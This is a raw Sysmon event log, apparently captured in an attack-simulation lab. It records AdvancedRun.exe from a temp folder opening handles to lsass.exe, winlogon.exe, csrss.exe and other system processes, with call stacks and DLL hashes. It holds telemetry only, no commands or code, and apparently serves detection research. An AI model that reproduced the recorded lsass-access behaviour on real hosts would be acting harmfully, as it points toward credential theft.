18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004011627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004011619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:43.317{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft 
Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
